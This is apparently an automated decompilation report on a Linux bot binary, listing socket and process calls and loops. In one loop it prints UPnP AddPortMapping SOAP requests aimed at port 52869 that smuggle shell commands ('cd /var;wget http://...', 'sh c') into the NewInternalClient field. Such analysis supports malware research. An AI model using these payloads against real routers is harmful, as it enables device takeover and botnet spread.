    int32_t v402 = getuid(); // 0x407310
=================FUNCTION : function_404b70 ===================
++++++++ FUNCTION START 22043
++++++++ FUNCTION END 22458
++++++++ FUNCTION LENGTH 415
    int32_t v402 = fork(); // 0x404b90
=================FUNCTION : function_4003b8 ===================
++++++++ FUNCTION START 1504
++++++++ FUNCTION END 1939
++++++++ FUNCTION LENGTH 435
    while (true) {
=================FUNCTION : function_404460 ===================
++++++++ FUNCTION START 16932
++++++++ FUNCTION END 17381
++++++++ FUNCTION LENGTH 449
        while (true) {
=================FUNCTION : function_4054d0 ===================
++++++++ FUNCTION START 29664
++++++++ FUNCTION END 30108
++++++++ FUNCTION LENGTH 444
    while (true) {
=================FUNCTION : function_4071d0 ===================
++++++++ FUNCTION START 48179
++++++++ FUNCTION END 48594
++++++++ FUNCTION LENGTH 415
    int32_t v402 = getegid(); // 0x4071f0
=================FUNCTION : function_405940 ===================
++++++++ FUNCTION START 33966
++++++++ FUNCTION END 34380
++++++++ FUNCTION LENGTH 414
    int32_t v402 = listen(sock, backlog); // 0x405960
=================FUNCTION : function_404b10 ===================
++++++++ FUNCTION START 21625
++++++++ FUNCTION END 22040
++++++++ FUNCTION LENGTH 415
    int32_t v402 = close(fd); // 0x404b30
=================FUNCTION : function_4058c0 ===================
++++++++ FUNCTION START 33549
++++++++ FUNCTION END 33963
++++++++ FUNCTION LENGTH 414
    int32_t v402 = getsockopt(sock, level, option_name, option_value, NULL); // 0x4058f8
=================FUNCTION : function_400420 ===================
++++++++ FUNCTION START 1942
++++++++ FUNCTION END 2403
++++++++ FUNCTION LENGTH 461
    while (true) {
=================FUNCTION : function_400f98 ===================
++++++++ FUNCTION START 5817
++++++++ FUNCTION END 6239
++++++++ FUNCTION LENGTH 422
    while (true) {
=================FUNCTION : function_4074f0 ===================
++++++++ FUNCTION START 51138
++++++++ FUNCTION END 51567
++++++++ FUNCTION LENGTH 429
    int32_t v402 = sigprocmask(how, set, (struct _TYPEDEF_sigset_t *)oset); // 0x407548
=================FUNCTION : function_4057a0 ===================
++++++++ FUNCTION START 32296
++++++++ FUNCTION END 32710
++++++++ FUNCTION LENGTH 414
    int32_t v402 = bind(sock, addr, addr_len); // 0x4057c0
=================FUNCTION : function_40491c ===================
++++++++ FUNCTION START 19897
++++++++ FUNCTION END 20359
++++++++ FUNCTION LENGTH 462
    while (true) {
=================FUNCTION : function_407290 ===================
++++++++ FUNCTION START 49015
++++++++ FUNCTION END 49430
++++++++ FUNCTION LENGTH 415
    int32_t v402 = getgid(); // 0x4072b0
=================FUNCTION : function_404550 ===================
++++++++ FUNCTION START 17384
++++++++ FUNCTION END 17825
++++++++ FUNCTION LENGTH 441
    while (true) {
=================FUNCTION : function_405800 ===================
++++++++ FUNCTION START 32713
++++++++ FUNCTION END 33128
++++++++ FUNCTION LENGTH 415
    int32_t v402 = connect(sock, addr, addr_len); // 0x405820
=================FUNCTION : function_404c90 ===================
++++++++ FUNCTION START 23297
++++++++ FUNCTION END 23712
++++++++ FUNCTION LENGTH 415
    int32_t v402 = kill(pid, sig_num); // 0x404cb0
=================FUNCTION : function_405860 ===================
++++++++ FUNCTION START 33131
++++++++ FUNCTION END 33546
++++++++ FUNCTION LENGTH 415
    int32_t v402 = getsockname(sock, addr, (int32_t *)addr_len); // 0x405880
=================FUNCTION : function_407000 ===================
++++++++ FUNCTION START 47708
++++++++ FUNCTION END 48176
++++++++ FUNCTION LENGTH 468
    while (true) {
=================FUNCTION : function_404bd0 ===================
++++++++ FUNCTION START 22461
++++++++ FUNCTION END 22876
++++++++ FUNCTION LENGTH 415
    int32_t pid = getpid(); // 0x404bf0
=================FUNCTION : function_406210 ===================
++++++++ FUNCTION START 40021
++++++++ FUNCTION END 40476
++++++++ FUNCTION LENGTH 455
    while (true) {
=================FUNCTION : function_405b60 ===================
++++++++ FUNCTION START 36051
++++++++ FUNCTION END 36465
++++++++ FUNCTION LENGTH 414
    int32_t v402 = setsockopt(sock, level, option_name, option_value, 0); // 0x405b98
=================FUNCTION : function_4069a8 ===================
++++++++ FUNCTION START 44852
++++++++ FUNCTION END 45595
++++++++ FUNCTION LENGTH 743
    while (true) {
=================FUNCTION : function_400584 ===================
++++++++ FUNCTION START 2406
++++++++ FUNCTION END 2840
++++++++ FUNCTION LENGTH 434
    while (true) {
=================FUNCTION : function_407830 ===================
++++++++ FUNCTION START 52806
++++++++ FUNCTION END 53466
++++++++ FUNCTION LENGTH 660
        while (true) {
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 4 @ function_400624 ====================================
++++++++ WHILE START : 3289 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3388 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 5 @ function_400624 ====================================
++++++++ WHILE START : 3398 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3430 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 6 @ function_400624 ====================================
++++++++ WHILE START : 3439 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3471 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 7 @ function_400624 ====================================
++++++++ WHILE START : 3480 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3512 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 8 @ function_400624 ====================================
++++++++ WHILE START : 3522 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3554 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 11 @ function_400d04 ====================================
++++++++ WHILE START : 5278 
++++++++ WHILE FUNCTION : function_400d04 
++++++++ WHILE END : 5336 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 12 @ function_400e4c ====================================
++++++++ WHILE START : 5748 
++++++++ WHILE FUNCTION : function_400e4c 
++++++++ WHILE END : 5809 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 16 @ function_401104 ====================================
++++++++ WHILE START : 7719 
++++++++ WHILE FUNCTION : function_401104 
++++++++ WHILE END : 7889 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 17 @ function_401f84 ====================================
++++++++ WHILE START : 8902 
++++++++ WHILE FUNCTION : function_401f84 
++++++++ WHILE END : 9242 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		function_405800(v449, (struct sockaddr *)&v447, 16);
		case 263: {
		while (true) {
		case 0: {
		while (true) {
		case 11: {
		while (true) {
		case 4: {
		case 11: {
		while (true) {
		case 4: {
=============================WHILE LOOPS ID : 18 @ function_402b38 ====================================
++++++++ WHILE START : 10903 
++++++++ WHILE FUNCTION : function_402b38 
++++++++ WHILE END : 11577 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		if (function_405800(v451, (struct sockaddr *)&v425, 16) != a1) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		if (function_405800(v451, (struct sockaddr *)&v425, 16) != a1) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 19 @ function_403260 ====================================
++++++++ WHILE START : 12520 
++++++++ WHILE FUNCTION : function_403260 
++++++++ WHILE END : 12995 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");
		function_404370((char *)&v425, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
		function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");
		function_404370((char *)&v425, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
		function_4043d0((char *)&v425, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");
		function_404370((char *)&v425, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
=============================WHILE LOOPS ID : 20 @ function_403260 ====================================
++++++++ WHILE START : 13000 
++++++++ WHILE FUNCTION : function_403260 
++++++++ WHILE END : 13073 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 21 @ function_404134 ====================================
++++++++ WHILE START : 13922 
++++++++ WHILE FUNCTION : function_404134 
++++++++ WHILE END : 14002 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 24 @ function_4045b0 ====================================
++++++++ WHILE START : 18231 
++++++++ WHILE FUNCTION : function_4045b0 
++++++++ WHILE END : 18610 
++++++++ INTRESTING INSTRUCTIONS :  
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
=============================WHILE LOOPS ID : 34 @ function_407ca0 ====================================
++++++++ WHILE START : 54598 
++++++++ WHILE FUNCTION : function_407ca0 
++++++++ WHILE END : 54672 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
